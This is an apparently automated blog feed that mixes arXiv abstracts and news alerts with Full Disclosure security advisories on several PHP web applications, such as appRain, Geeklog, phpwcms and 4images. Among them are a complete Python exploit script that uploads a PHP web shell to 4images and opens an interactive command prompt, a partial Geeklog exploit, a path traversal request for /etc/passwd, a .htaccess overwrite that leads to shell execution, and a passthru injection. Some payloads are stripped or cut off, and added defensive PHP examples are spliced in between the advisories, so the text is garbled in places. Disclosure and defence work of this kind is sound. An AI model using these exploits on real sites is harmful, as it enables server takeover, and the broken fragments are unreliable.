algorithms enable HL-MRFs and PSL to model rich, structured data at scales not previously possible.

from cs.AI updates on arXiv.org http://ift.tt/1AhkWaY
via IFTTT

Belief and Truth in Hypothesised Behaviours. (arXiv:1507.07688v2 [cs.AI] UPDATED)

There is a long history in game theory on the topic of Bayesian or "rational" learning, in which each player maintains beliefs over a set of alternative behaviours, or types, for the other players. This idea has gained increasing interest in the artificial intelligence (AI) community, where it is used as a method to control a single agent in a system composed of multiple agents with unknown behaviours. The idea is to hypothesise a set of types, each specifying a possible behaviour for the other agents, and to plan our own actions with respect to those types which we believe are most likely, given the observed actions of the agents. The game theory literature studies this idea primarily in the context of equilibrium attainment. In contrast, many AI applications have a focus on task completion and payoff maximisation. With this perspective in mind, we identify and address a spectrum of questions pertaining to belief and truth in hypothesised types. We formulate three basic ways to incorporate evidence into posterior beliefs and show when the resulting beliefs are correct, and when they may fail to be correct. Moreover, we demonstrate that prior beliefs can have a significant impact on our ability to maximise payoffs in the long-term, and that they can be computed automatically with consistent performance effects. Furthermore, we analyse the conditions under which we are able to complete our task optimally, despite inaccuracies in the hypothesised types. Finally, we show how the correctness of hypothesised types can be ascertained during the interaction via an automated statistical analysis.

from cs.AI updates on arXiv.org http://ift.tt/1JQl9k3
via IFTTT

Return of Frustratingly Easy Domain Adaptation. (arXiv:1511.05547v2 [cs.CV] UPDATED)

Unlike human learning, machine learning often fails to handle changes between training (source) and test (target) input distributions. Such domain shifts, common in practical scenarios, severely damage the performance of conventional machine learning methods. Supervised domain adaptation methods have been proposed for the case when the target data have labels, including some that perform very well despite being "frustratingly easy" to implement. However, in practice, the target domain is often unlabeled, requiring unsupervised adaptation. We propose a simple, effective, and efficient method for unsupervised domain adaptation called CORrelation ALignment (CORAL). CORAL minimizes domain shift by aligning the second-order statistics of source and target distributions, without requiring any target labels. Even though it is extraordinarily simple--it can be implemented in four lines of Matlab code--CORAL performs remarkably well in extensive evaluations on standard benchmark datasets.

from cs.AI updates on arXiv.org http://ift.tt/1WY5345
via IFTTT

Anonymous wants us all to troll ISIS on Friday with hashtag #daeshbags

Anonymous has a job for you: Troll ISIS for one day. ... Anonymous even suggests printing out stickers and posters that mock ISIS and posting them up ...

from Google Alert - anonymous http://ift.tt/1mbkNA1
via IFTTT

Emotions Anonymous Support Group

Emotions Anonymous Support Group. Date: Every Wednesday. Location: Garden City Hospital Campus, Allan Breakie Medical Office Building, Lower ...

from Google Alert - anonymous http://ift.tt/1mbkLrX
via IFTTT

[FD] [CVE-2014-3260] Crypto implementation flaws in Pacom GMS System

Source: Gmail -> IFTTT-> Blogger

[FD] GoAutoDial CE 3.3 Multiple SQL injections, Command Injection



Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-2 tvOS 9.1

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-6 Xcode 7.2



Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-5 Safari 9.0.2



Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-4 watchOS 2.1

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-1 iOS 9.2



Source: Gmail -> IFTTT-> Blogger

[FD] LG Nortel ADSL modems - Multiple vulnerabilities

[FD] [CVE-2015-7706] SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities

Source: Gmail -> IFTTT-> Blogger

Anonymous hackers declare Friday "Troll ISIS Day"

In an online post to ghostbin.com, Anonymous asked Web users to 'show your support and help against ISIS by joining us and trolling them.'

from Google Alert - anonymous http://ift.tt/1IFpNqN
via IFTTT

Download link token for anonymous users

However, in case I want to make this download link (only one time) available to an anonymous user, via a mail (executed by rules) to the mail-id ...

from Google Alert - anonymous http://ift.tt/1M3DI4z
via IFTTT

[FD] Executable installers are vulnerable^WEVIL (case 9): Chrome's setup.exe allows arbitrary code execution and escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 5): JRSoft InnoSetup

[FD] Executable installers are vulnerable^WEVIL (case 2): NSIS allows remote code execution with escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 8): vlc-*.exe allows remote code execution with escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 6): SumatraPDF-*-installer.exe allows remote code execution with escalation of privilege

[FD] Defense in depth -- the Microsoft way (part 37): MMC.exe and DrvInst.exe load and execute ".dll" with elevated resp. SYSTEM privileges

[FD] appRain 4.0.3: Code Execution

[FD] appRain 4.0.3: CSRF

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: appRain 4.0.3
Fixed in: Fixed via Optional Module CSRF Protection Module http://ift.tt/1OTM6bA Link: =Description
Vendor Website: info@apprain.com
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

None of the requests have CSRF protection. This means that an attacker can execute actions for an admin if the admin visits an attacker controlled website while logged in.

3. Proof of Concept

Add new Admin:

Code Execution (using the PHP file editor):

[FD] appRain 4.0.3: Path Traversal

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: appRain 4.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: info@apprain.com
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Full Disclosure
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description

The "loc" parameter of the appeditor is vulnerable to directory traversal, which allows the viewing of arbitrary files.

Admin credentials are required to view files. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component.

3. Proof of Concept

http://localhost/apprain-source-4.0.3/appeditor?loc=../../../../../../../etc/passwd

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline

10/02/2015 Informed Vendor. Mailbox info@apprain.com is full, used security@apprain.com instead (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor announces fix for 11/02/2015
11/04/2015 No fix released, extended public disclosure date to 11/11/2015
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of release date, extended date to 12/02/2015 and offered extension if needed (no reply)
12/02/2015 Disclosed to public

Blog Reference: http://ift.tt/1OiD4BY

Source: Gmail -> IFTTT-> Blogger
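
A containment check for a file parameter like the "loc" value described above, as an added example that is not appRain code. The function name resolve_editable_path() and the temporary directory layout are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example: not appRain code. resolve_editable_path() and the directory
// layout built below are hypothetical; all inputs are constructed.

/**
 * Resolve a user-supplied relative path and confirm it stays inside $baseDir.
 * Returns the canonical absolute path, or throws if the path leaves the base.
 */
function resolve_editable_path(string $baseDir, string $userPath): string
{
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('base directory does not exist');
    }
    // Reject empty values and NUL bytes before touching the file system.
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        throw new InvalidArgumentException('empty or malformed path');
    }
    // realpath() collapses "..", "." and symlinks, so the comparison below is
    // made on the location the file system would actually open.
    $resolved = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($resolved === false || !is_file($resolved)) {
        throw new InvalidArgumentException('no such file');
    }
    // Compare against "base/" rather than "base", so that a sibling directory
    // such as "editable-private" does not pass a prefix test for "editable".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException('path escapes the editable directory');
    }
    return $resolved;
}

// --- Demo on a constructed directory tree -----------------------------------
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'loc-demo-' . bin2hex(random_bytes(4));
mkdir("$root/editable/view", 0700, true);
mkdir("$root/editable-private", 0700, true);
file_put_contents("$root/editable/view/home.phtml", 'template');
file_put_contents("$root/secret.txt", 'outside the editable tree');
file_put_contents("$root/editable-private/key.txt", 'outside the editable tree');

$candidates = [
    'view/home.phtml',                        // legitimate file
    '../secret.txt',                          // one level up
    'view/../../secret.txt',                  // traversal hidden behind a valid prefix
    '../editable-private/key.txt',            // sibling whose name shares the prefix
    '../../../../../../../etc/passwd',        // value from the advisory's proof of concept
];

foreach ($candidates as $loc) {
    try {
        resolve_editable_path("$root/editable", $loc);
        $verdict = 'allowed';
    } catch (InvalidArgumentException $e) {
        $verdict = 'rejected: ' . $e->getMessage();
    }
    printf("%-36s %s\n", $loc, $verdict);
}

// Clean up the constructed tree.
unlink("$root/editable/view/home.phtml");
unlink("$root/editable-private/key.txt");
unlink("$root/secret.txt");
rmdir("$root/editable/view");
rmdir("$root/editable");
rmdir("$root/editable-private");
rmdir($root);
```

Only the first candidate is allowed; the others are rejected either because they resolve outside the base directory or because the file does not exist on the machine running the demo.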

[FD] appRain 4.0.3: XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: appRain 4.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: info@apprain.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Full Disclosure
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

There are two reflected XSS vulnerabilities in appRain 4.0.3. This can lead to the injection of JavaScript keyloggers or the bypassing of CSRF protection. In the case of appRain, this may lead to code execution.

3. XSS 1

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

The search of the file manager echoes user input without encoding, leading to reflected XSS.

Proof of Concept

" />

Code

/apprain/base/modules/toolbar.php

    private function btnFilemanagerSrcBox($srcstr = "")
    {
        $html = '
';
        return array('box' => $html);
    }

4. XSS 2

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

The appeditor echoes the given file name and path without encoding, leading to reflected XSS.

Proof of Concept

http://localhost/apprain-source-4.0.3/appeditor?loc='">

Code

/component/appeditor/controllers/appeditor/index.phtml

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

10/02/2015 Informed Vendor. Mailbox info@apprain.com is full, used security@apprain.com instead (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor announces fix for 11/02/2015
11/04/2015 No fix released, extended public disclosure date to 11/11/2015
11/05/2015 Vendor asks for list of organizations that may help implementing fixes
11/11/2015 Replied that we do not have lists, and that we do not have the resources to implement fixes ourselves. Extended release date to 11/18/2015 and offered further extension if needed (no reply)
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of release date, extended date to 12/02/2015 and offered extension if needed (no reply)
12/02/2015 Disclosed to public

Blog Reference: http://ift.tt/1IFbUbX

Source: Gmail -> IFTTT-> Blogger

[FD] redaxscript 2.5.0: Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: redaxscript 2.5.0
Fixed in: module has been removed in version 2.6.0
Fixed Version Link: n/a
Vendor Contact: info@redaxmedia.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

The module file_manager allows for file uploads, and uses exif_imagetype to check the validity of the file. By setting the first bytes of the uploaded file to that of a valid image type, an attacker can easily bypass this check and thus upload files of dangerous type.

It should be noted that only files with the name index.php will be executed, as access to all other PHP files is forbidden by a htaccess file.

An account that has access to the module "File manager" is needed to exploit this issue.

3. Code

/modules/file_manager/index.php

    function file_manager_upload($directory = '')
    {
        $file = $_FILES['file']['tmp_name'];
        $file_name = file_manager_clean_file_name($_FILES['file']['name']);
        $file_size = $_FILES['file']['size'];

        /* validate post */

        if (function_exists('exif_imagetype'))
        {
            if (exif_imagetype($file) == '')
            {
                $error = l('file_type_limit', '_file_manager') . l('point');
            }
        }

4. Solution

To mitigate this issue please remove the file_manager module.

5. Report Timeline

10/02/2015 Informed Vendor about Issue
11/15/2015 Vendor removes affected module
12/02/2015 Disclosed to public

Blog Reference: http://ift.tt/21PDh9D

Source: Gmail -> IFTTT-> Blogger

[FD] Geeklog 2.1.0: Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Geeklog 2.1.0
Fixed in: 2.1.1b3
Fixed Version Link: http://ift.tt/1OTKizb
Vendor Contact: geeklog-security@lists.geeklog.net
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

The admin area of Geeklog suffers from two vulnerabilities that can lead to code execution: OS Command Injection and Upload of Files with Dangerous Type. The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1, the OS command injection in version 2.1.1b3.

3. Upload of Files with Dangerous Type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file type check is performed only client-side. An attacker can easily bypass this check and thus upload files of dangerous types, such as PHP files.

To upload files, an attacker needs a registered user that is in the group "Filemanager Admin".

Proof of Concept

POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] Geeklog 2.1.0: Code Execution Exploit

#!/usr/local/bin/python
# Exploit for geeklog-2.1.0 OS Command Injection vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

loginPath = "/admin/moderation.php"
configPath = "/admin/configuration.php?tab-5"
backupPath = "/admin/database.php"
shellFileName = "404.php"
shellContent = "

[FD] Geeklog 2.1.0: XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Geeklog 2.1.0
Fixed in: 2.1.1b3
Fixed Version Link: http://ift.tt/1OTKizb
Vendor Contact: geeklog-security@lists.geeklog.net
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

There is at least one XSS vulnerability in the installation script of Geeklog.

Geeklog recommends to delete the install directory and displays warnings in the admin area if this is not the case. However, deleting the install directory is not mandatory, so it should be assumed that not all users will delete it.

3. Proof of Concept

http://localhost/geeklog-2.1.0/public_html/admin/install/bigdump.php?foffset=1&start=1&fn=test.sql

$_REQUEST['site_url'], $_REQUEST['site_admin_url'], and $_SERVER['PHP_SELF'] may be vulnerable as well, but the attacker would need a valid sql backup file to trigger them.

4. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:

http://ift.tt/1OTKizb

Please note that a newer version might already be available.

5. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public

Blog Reference: http://ift.tt/1OTKlLp

Source: Gmail -> IFTTT-> Blogger

[FD] phpwcms 1.7.9: Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: phpwcms 1.7.9
Fixed in: 1.8.0 RC1
Fixed Version Link: http://ift.tt/1lPID3R phpwcms-1.8.0-RC1.zip
Vendor Website: http://www.phpwcms.de/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

phpwcms allows the upload of files with dangerous type, which leads to code execution. Additionally, it allows registered users who are not admins to use PHP tags, which also leads to code execution.

Please note that a user account is needed to upload files. The user does not need administration rights, but there is no open registration by default (the form to add users is however open to CSRF).

3. Unrestricted Upload of File with Dangerous Type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading files, there are no checks as to the type or extension of the file.

When uploading single files, these are stored inside the "filearchive" directory. The original file name is changed to the hash of the file name. The directory is protected with a .htaccess file from accessing or executing files directly. Because of this, uploading single files can not easily be exploited; it may however be possible to execute them via include_int_php (see below).

However, when uploading multiple files, these are stored temporarily inside the "upload" directory, and these files are not renamed. The "upload" directory is also protected by an .htaccess file, but as .htaccess files can be uploaded, it can be overwritten, thus leading to code execution.

Please note that a user account is needed to upload files. The user does not need administration rights, but there is no open registration by default.

Proof of Concept

Upload a .htaccess file and a PHP file here:

http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=files&p=8

The .htaccess file should contain:

allow from all

Now the uploaded PHP file can be accessed and executed:

http://localhost/phpwcms-phpwcms-1.7.9/upload/shell.php?x=id

4. Code Execution

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

The functions include_int_php, include_int_phpcode, and include_ext_php can all be used to gain code execution.

These functions can be used by any logged in user, admin rights are not required.

Proof of Concept

Create a new article. As author, use

[PHP] passthru("touch mynewtest.php") [/PHP]

Visiting http://localhost/phpwcms-phpwcms-1.7.9/feeds.php is one of the ways to trigger the code execution.

Please note that the feed is by default cached for one hour, during which the code would not be executed as the cache is loaded instead. The vulnerable functions are used in other places as well, which means an attacker may not have to wait an hour for the cache to clear by triggering the code elsewhere.

5. Solution

To mitigate this issue please upgrade at least to version 1.8.0 RC1:

http://ift.tt/1HVaI48

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor confirmed issues
10/21/2015 Reminded Vendor of Disclosure Date
10/25/2015 Vendor requests more time
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of Disclosure Date
11/29/2015 Vendor releases fix
12/02/2015 Disclosed to public

Blog Reference: http://ift.tt/1QfE2VN

Source: Gmail -> IFTTT-> Blogger
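
The upload findings in the redaxscript, Geeklog and phpwcms advisories above share one root cause: the server trusts a signature check, a client-side check, or the client's file name. The following added example (not code from any of those projects) puts the signature-only check beside a server-side handler that decodes the image and picks its own file name; the function names and the image-only policy are assumptions, the inputs are constructed, and the exif and gd extensions are required.

```php
<?php
// Added example: not redaxscript, Geeklog or phpwcms code. Function names and
// the image-only upload policy are assumptions. Needs ext-exif and ext-gd.

const ALLOWED_TYPES = [
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_GIF  => 'gif',
];

// The check described in the redaxscript advisory: it passes for any file
// whose leading bytes match an image signature, whatever follows them.
function weak_check(string $tmpPath): bool
{
    return @exif_imagetype($tmpPath) != '';
}

/**
 * Validate and store an uploaded image. Returns the server-chosen file name.
 * The client's file name and extension are never used, so names such as
 * "index.php" or ".htaccess" cannot reach the storage directory.
 */
function store_image_upload(string $tmpPath, string $storageDir): string
{
    // 1. Allowlist on the detected type, not on anything the client sent.
    $type = @exif_imagetype($tmpPath);
    if ($type === false || !isset(ALLOWED_TYPES[$type])) {
        throw new InvalidArgumentException('file type not allowed');
    }
    // 2. Decode the whole file. A valid signature followed by other content
    //    fails here, which the signature check alone cannot detect.
    $data  = file_get_contents($tmpPath);
    $image = ($data === false) ? false : @imagecreatefromstring($data);
    if ($image === false) {
        throw new InvalidArgumentException('not a decodable image');
    }
    // 3. Re-encode into a new file under a random name with a fixed extension.
    //    Only pixel data written by the encoder ends up on disk.
    $name   = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$type];
    $target = rtrim($storageDir, '/\\') . DIRECTORY_SEPARATOR . $name;
    switch ($type) {
        case IMAGETYPE_PNG:
            imagesavealpha($image, true);
            $ok = imagepng($image, $target);
            break;
        case IMAGETYPE_JPEG:
            $ok = imagejpeg($image, $target, 90);
            break;
        default:
            $ok = imagegif($image, $target);
    }
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    return $name;
}

// --- Demo with two constructed inputs ---------------------------------------
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'upload-demo-' . bin2hex(random_bytes(4));
mkdir("$dir/store", 0700, true);

// A real 4x4 PNG produced by GD.
imagepng(imagecreatetruecolor(4, 4), "$dir/real.tmp");
// PNG signature followed by inert, constructed filler: not a decodable image.
file_put_contents("$dir/fake.tmp", "\x89PNG\r\n\x1a\n" . str_repeat('constructed filler ', 4));

foreach (['real.tmp', 'fake.tmp'] as $file) {
    $weak = weak_check("$dir/$file") ? 'accepts' : 'rejects';
    try {
        $strict = 'stored as ' . store_image_upload("$dir/$file", "$dir/store");
    } catch (InvalidArgumentException $e) {
        $strict = 'rejected: ' . $e->getMessage();
    }
    echo "$file: signature check $weak; full validation $strict\n";
}

// Clean up the constructed files.
array_map('unlink', glob("$dir/store/*"));
unlink("$dir/real.tmp");
unlink("$dir/fake.tmp");
rmdir("$dir/store");
rmdir($dir);
```

The signature check accepts both files, while the full validation stores only the real image. The storage directory should additionally sit outside the web root or be served without script execution.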

[FD] phpwcms 1.7.9: CSRF

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: phpwcms 1.7.9
Fixed in: 1.8.0 RC1
Fixed Version Link: http://ift.tt/1lPID3R phpwcms-1.8.0-RC1.zip
Vendor Website: http://www.phpwcms.de/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

There is no CSRF protection for any forms, which means that an attacker can perform any action a victim can perform, if the victim visits an attacker controlled website while logged in.

In the case of phpwcms, an attacker can add an admin user and thus gain code execution.

3. Proof of Concept

Add Admin User:

4. Solution

To mitigate this issue please upgrade at least to version 1.8.0 RC1:

http://ift.tt/1HVaI48

Please note that a newer version might already be available.

5. Report Timeline

09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor confirmed issues
10/21/2015 Reminded Vendor of Disclosure Date
10/25/2015 Vendor requests more time
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of Disclosure Date
11/29/2015 Vendor releases fix
12/02/2015 Disclosed to public

Blog Reference: http://ift.tt/1lPID3T

Source: Gmail -> IFTTT-> Blogger
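
Both the appRain and the phpwcms CSRF advisories above describe state-changing admin forms that carry no per-session secret. The following added example (not code from either project) shows a synchronizer-token check on a hypothetical "add admin" handler; all function, field and session-key names are assumptions, and the session is passed as an array so the demo runs from the command line.

```php
<?php
// Added example: not appRain or phpwcms code. All names are hypothetical.
// The session is a plain array here; in an application it would be $_SESSION.

// Create the per-session token on first use and return it.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in every state-changing form.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison of the submitted token with the session's token.
function csrf_is_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // is_string() guards against "csrf_token[]=x", which PHP parses into an
    // array and which hash_equals() would reject with a TypeError.
    return is_string($expected) && $expected !== ''
        && is_string($supplied)
        && hash_equals($expected, $supplied);
}

// Hypothetical handler for the "add admin user" form.
function handle_add_admin(array &$session, string $method, array $post): string
{
    if ($method !== 'POST') {
        return '405 state changes require POST';
    }
    if (empty($session['is_admin'])) {
        return '403 not logged in as admin';
    }
    if (!csrf_is_valid($session, $post)) {
        return '403 CSRF token missing or wrong';
    }
    return '200 admin account created';
}

// --- Demo with constructed requests -----------------------------------------
$session = ['is_admin' => true];
$form    = csrf_field($session);          // rendering the form issues the token

$requests = [
    'cross-site form, no token'   => ['POST', ['username' => 'newadmin']],
    'cross-site form, guessed'    => ['POST', ['username' => 'newadmin', 'csrf_token' => str_repeat('0', 64)]],
    'token sent as array'         => ['POST', ['username' => 'newadmin', 'csrf_token' => ['x']]],
    'state change via GET'        => ['GET',  ['username' => 'newadmin', 'csrf_token' => $session['csrf_token']]],
    'form served by the site'     => ['POST', ['username' => 'newadmin', 'csrf_token' => $session['csrf_token']]],
];

foreach ($requests as $label => [$method, $post]) {
    printf("%-28s %s\n", $label, handle_add_admin($session, $method, $post));
}
```

Only the last request, which carries the token issued with the site's own form, reaches the account-creation step.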

[FD] CodoForum 3.4: XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: CodoForum 3.4
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: admin@codologic.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 12/02/2015
Release mode: Full Disclosure
CVE: Requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability in CodoForum 3.4. With this, it is possible to steal cookies, bypass CSRF protection, or inject JavaScript keyloggers.

The HybridAuth 2.1.2 Install script is vulnerable to XSS attacks. In version 3.4, CodoForum did update HybridAuth to the latest version, but kept the old version in a folder called hybridauthold.

3. Proof of Concept

http://localhost/codoforum/sys/Ext/hybridauthold/install.php/">

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/23/2015 Vendor requests clarification
09/23/2015 Clarified Issue
09/29/2015 Reminded Vendor of disclosure date
09/29/2015 Vendor requests more time
09/29/2015 Set new disclosure date
11/03/2015 Reminded Vendor of disclosure date (no reply)
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public

Blog Reference: http://ift.tt/1lPI5es

Source: Gmail -> IFTTT-> Blogger

[FD] 4images 1.7.11: Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: 4images 1.7.11
Fixed in: 1.7.12
Fixed Version Link: http://ift.tt/1NMG3Cf
Vendor Website: http://ift.tt/XKxPm3
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/04/2015
Release mode: Coordinated release
CVE: Requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description: 4images comes with a HTML Template editor which allows the editing of HTML files. But it will also create a new file if the passed file name does not already exist. When doing this, it does not check that the extension of the passed file is .html.

Admin credentials are required to use the HTML template editor.

3. Proof of Concept

    POST /4images/admin/templates.php HTTP/1.1

    __csrf=28a9a05b480c3f8ed326523b1ce7532c&action=savetemplate&content=

[FD] 4images 1.7.11: Code Execution Exploit

    #!/usr/local/bin/python
    # Exploit for 4images 1.7.11 Code Execution vulnerability
    # An admin account is required to use this exploit
    # Curesec GmbH

    import sys
    import re
    import argparse
    import requests # requires requests lib

    parser = argparse.ArgumentParser()
    parser.add_argument("url", help="base url to vulnerable site")
    parser.add_argument("username", help="admin username")
    parser.add_argument("password", help="admin password")
    args = parser.parse_args()

    url = args.url
    username = args.username
    password = args.password

    loginPath = "/admin/index.php"
    fileManagerPath = "/admin/templates.php"

    shellFileName = "404.php"
    shellContent = ""

    def login(requestSession, url, username, password):
        csrfRequest = requestSession.get(url)
        csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
        csrfToken = csrfTokenRegEx.group(1)

        postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}
        loginResult = requestSession.post(url, data = postData).text
        return "loginpassword" not in loginResult

    def upload(requestSession, url, fileName, fileContent):
        csrfRequest = requestSession.get(url)
        csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
        csrfToken = csrfTokenRegEx.group(1)

        postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}
        loginResult = requestSession.post(url, data = postData).text

    def runShell(url):
        print("enter command, or enter exit to quit.")
        command = raw_input("$ ")
        while "exit" not in command:
            print(requests.get(url + command).text)
            command = raw_input("$ ")

    requestSession = requests.session()

    if login(requestSession, url + loginPath, username, password):
        print("successful: login")
    else:
        exit("ERROR: Incorrect username or password")

    upload(requestSession, url + fileManagerPath, shellFileName, shellContent)

    runShell(url + "/templates/default/" + shellFileName + "?x=")

Blog Reference: http://ift.tt/1lPGGEt

Source: Gmail -> IFTTT-> Blogger

[FD] 4images 1.7.11: Path Traversal

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: 4images 1.7.11
Fixed in: 1.7.12
Fixed Version Link: http://ift.tt/1NMG3Cf
Vendor Website: http://ift.tt/XKxPm3
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: Requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

